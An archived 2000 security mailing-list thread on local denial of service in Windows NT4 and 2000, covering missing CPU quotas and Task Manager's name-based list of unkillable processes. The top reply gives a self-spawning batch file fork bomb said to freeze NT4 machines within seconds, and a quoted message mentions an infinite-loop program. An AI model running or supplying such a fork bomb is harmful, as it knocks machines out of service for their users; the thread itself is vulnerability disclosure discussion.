OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Win2K Local DoS?
From: Nicolas Rachinsky (rnicolasGMX.NET)
Date: Tue Aug 08 2000 - 14:47:43 CDT


Try following to kill any NT4 machine I know (up to SP5 including Terminalserver).
Start the following batch file.
---sexporn.bat----
:a
start sexporn.bat
goto a

----
It rendered all the test machines unusable within few seconds.
Nicolas

----- Original Message ----- From: Kevin Stephenson <kevin.stephensonPOBOX.COM> To: <VULN-DEVSECURITYFOCUS.COM> Sent: Sunday, August 06, 2000 6:57 AM Subject: Re: Win2K Local DoS?

> I'm a bit out of my league here, but if a company wanted to physically > secure their hardware (at least the power button and cord) and try to > harden their Win2k Pro boxes in order to try and get some Orange Book level > certification, aren't they fundamentally screwed because of things like > this? I think this idea can be further developed into a nasty little DoS > attack somehow. See page 550 in the Win2K Pro Resource Kit. It has some > information about Increase Quotas and Increase Scheduling Priority Local > Policies. > > It might be a good idea to write a program that runs as a service at the > Local System level that monitors for rogue processes and lowers their > priorities to thwart a DoS attack in lieu of process quotas, which appear > to be missing in all Microsoft OSes. This would be a non-trivial > programming task. So much for being an Enterprise class OS. Apparently any > half-wit can take down an Advanced/Datacenter server. > > At 07:19 PM 8/5/2000 +0200, you wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On 2000-08-04 at 10:14 Maxime Rousseau wrote: > > >Oliver Friedrichs says: > >! Once you have execute permission on a Windows system there's not > >! alot limiting you from using resources. > > > >Very true, I fail to see the use of a local DoS. If you want to kill > >the machine the 'shutdown' feature comes to mind. > > Only in Windows 2000 Professional do normal users have the privilege > to shutdown the machine, but this can be revoked by an administrator. > Normally that's a moot point, since the plug can always be pulled, of > course. :-) > > But if you consider Windows 2000 (Advancer) Server, which also > includes Terminal Services, this really can be an effective DoS, > since you can keep the CPU at 100%, and refuse to log out. Then > again, you could also do this with a main(){for(;;);} type thingy. I > am not aware of any option to set CPU quota in Windows 2000, but > please correct me if I'm wrong. > > > >Dimitry Andric says: > >! It simply checks for some reserved names, such as services.exe, > > To follow up on myself here, examination of the taskmgr.exe file > indicates that the list of "unkillable" processes consists of: > services.exe, smss.exe, winlogon.exe, csrss.exe and dllhost.exe. > Strangely lsass.exe and some others aren't even included, while > they're certainly critical. This now seems to be even more of a > last-minute hack from the taskmgr developers than I thought at first. > ;-) > > > >However I'm not quite sure to > >understand how you would not be able to use an OpenProcess() for > >something called services.exe. > > OpenProcess() is called with a process id, not with a name. You > lookup the pid in the task manager list, pass it to OpenProcess() to > get a handle, and pass that to TerminateProcess() to finish off the > process. However, even as an administrator, calling OpenProcess() > with the pid of most of these system processes will fail with an > "Access denied" error. So you can't terminate those processes in this > manner (there are other ways, though). The NT4 version of Task > Manager just displays these errors if you try to kill any of the > system processes. > > > >IMHO, this is a rather serious flaw in the task manager. Imposing > >restrictions or assuming a critical process by a string match on its > >name is not even bad, its downright evil (i wonder if i rename my > >account administrator... heh). Maybe someone should contact MS? > > I think they'll just say that if you have local access, you can DoS > the machine anyway. The only argument for removing this "feature" is > that it's prone to misuse by trojans and the like. You couldn't kill > services.exe anyway, so it can only be called superfluous. > > Cheers, > - -- > Dimitry Andric <dimxs4all.nl> > PGP key: http://www.xs4all.nl/~dim/dim.asc > KeyID: 4096/1024-0x2E2096A3 > Fingerprint: 7AB4 62D2 CE35 FC6D 4239 4FCD B05E A30A 2E20 96A3 > > -----BEGIN PGP SIGNATURE----- > Version: Encrypted with PGP Plugin for Calypso > Comment: http://www.gn.apc.org/duncan/stoa_cover.htm > > iQA/AwUBOYw+mbBeowouIJajEQKOFwCaAgXojCfYFYP7qBdhFlTyKt1IVLYAn1Iv > 1EOhRF0Bwm1z5PtRn+oxyJhy > =QmuF > -----END PGP SIGNATURE----- >